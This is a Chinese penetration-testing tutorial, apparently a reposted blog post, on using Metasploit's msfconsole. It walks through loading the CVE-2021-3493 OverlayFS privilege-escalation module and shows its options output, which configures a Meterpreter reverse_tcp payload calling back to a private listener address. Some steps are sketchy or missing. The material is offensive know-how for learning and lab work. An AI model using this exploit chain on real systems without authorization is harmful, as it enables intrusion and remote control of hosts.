码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 【kali-漏洞利用】(3.2)Metasploit基础(下):MSF终端利用过程


    目录

    一、MSF终端简介

    1.1、概述:

    1.2、通用命令:

    二、使用

    2.1、MSFCONSOLE漏洞利用

    第一步:终端启动MSFCONSOLE

    第二步:寻找模块

    第三步:使用模块

    第四步:查看有效选项

    第五步:设置payload

    第六步:执行渗透攻击


    一、MSF终端简介

    1.1、概述:

    MSF终端(MSFCONSOLE)是目前Metasploit框架最为流行的用户接口,因为MSF终端是Metasploit框架中最灵活、功能最丰富及支持最好的工具之一


    MSFCONSOLE主要用于管理Metasploit数据库, 管理会话、配置并启动Metasploit模块。本质上来说, 就是为了利用漏洞, MSFCONSOLE将获取用户连接到主机的信息,以至于用户能启动渗透攻击目标系统

    1.2、通用命令:

    help: 查看执行命令的帮助信息
    use module: 加载选择的模块
    set optionname module: 为模块设置不同的选项
    run: 启动一个非渗透攻击模块
    search module: 搜索一个特定的模块
    exit: 退出MSFCONSOLE



    二、使用

    2.1、MSFCONSOLE漏洞利用

    第一步:终端启动MSFCONSOLE

    以管理员身份运行

    sudo msfconsole

    出现msf提示符了,就登录成功了 


    第二步:寻找模块

    使用search加上自己想找的模块(相当于模糊查询)

    使用search命令搜索所有有效的Linux模块

    search linux


    第三步:使用模块

    使用use+模块名

    Ubuntu内核OverlayFS权限逃逸漏洞

    use exploit/linux/local/cve_2021_3493_overlayfs

    (就试一下这第一个)


    第四步:查看有效选项

    show options

    可以看见有4个模块,且都是必须的

    Current Setting(当前设置)

    已经有3个已经设置了

    还需要设置session

    1. Module options (exploit/linux/local/cve_2021_3493_overlayfs):
    2. Name Current Setting Required Description
    3. ---- --------------- -------- -----------
    4. COMPILE Auto yes Compile on target (Accepted: Auto, True, False)
    5. SESSION yes The session to run this module on
    6. Payload options (linux/x64/meterpreter/reverse_tcp):
    7. Name Current Setting Required Description
    8. ---- --------------- -------- -----------
    9. LHOST 192.168.190.149 yes The listen address (an interface may be specified)
    10. LPORT 4444 yes The listen port

    第五步:设置payload

    使用set + payload名 + 设置的东西

    (像这一样)


    第六步:执行渗透攻击

    输入exploit

  • 相关阅读:
    VM16中安装CentOS7.4保姆级教程
    转载:丰子恺迭浪式阅读法
    算法通关村第一关|黄金挑战|链表中的环问题&双向链表
    太酷了,用Python+Excel制作一个视频下载器,手把手教学讲解
    设计模式-建造者模式
    mysql基于ssm的自习室座位管理系统 毕业设计源码221118
    【数据结构】ArrayList和顺序表
    【老生谈算法】matlab实现fsk-ask算法源码——fsk-ask算法
    计网第四章(网络层)(九)
    微信小程序开发入门与实战(数据监听)
  • 原文地址:https://blog.csdn.net/qq_53079406/article/details/126174708
  • 最新文章
  • 【JVM】编译执行与解释执行的区别是什么?JVM 使用哪种方式?
    用 Hashids 优雅解决 C 端自增 ID 暴露问题
    V8引擎 精品漫游指南--Ignition篇(上) 指令 栈帧 槽位 调用约定 内存布局 基础内容
    LLVM Pass快速入门(四):代码插桩
    milkup:桌面端 markdown AI续写和即时渲染
    基于项目工程构建SBOM(软件物料清单)的研究
    鸿蒙应用开发UI基础第二节:鸿蒙应用程序框架核心解析与实操
    .NET 中如何快速实现 List 集合去重?
    扣子Coze实战:从0到1打造抖音+小红书热点监控智能体
    浅谈数据访问层
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
小工具 小游戏
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1

京公网安备 11010502049817号